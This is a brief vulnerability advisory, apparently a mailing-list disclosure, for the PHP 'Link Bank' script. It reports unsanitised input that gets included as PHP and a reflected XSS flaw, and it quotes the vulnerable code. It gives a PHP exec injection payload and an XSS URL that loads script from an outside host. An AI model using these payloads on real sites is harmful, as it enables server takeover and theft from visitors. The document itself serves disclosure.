??? summary software: Link Bank vendors website: http://daverave.64digits.com/index.php?page=linkbank versions: n/a class: remote status: unpatched exploit: available solution: not available discovered by: retard risk level: high ??? description Link Bank does not sanatise post sumbited to it allowing users to insert data that can be used malisiously. after it is submited the data goes to a .txt file witch the application reads and executes to display the links submited. along with this it is vulnerable to xss due to the application not sanatising the variable again. in ./content/index.txt: 14 <?php 15 include("links.txt"); 16 ?> in ./content/add_link.txt: 2 $url_name = $_REQUEST['url_name']; 3 $url = $_REQUEST['url']; 4 $img = $_REQUEST['img']; 5 $filename = "content/links.txt"; 6 $code = "<a href = iframe.php?site=$url target=_blank>$url_name</a><br>"; in ./iframe.php: 3 <title>Link Bank - <?php echo"$site";?></title> ??? exploit(s) code execution: submit something like <?php exec($cmd) ?> as a link name xss: http://example.com/iframe.php?site=%3C/title%3E%3C/head%3E%3Cscript%20sr c=http://notlegal.ws/xss.js%3E%3C/script%3E ??? credit author(s): retard email: retard (at) 30gigs (dot) com [email concealed]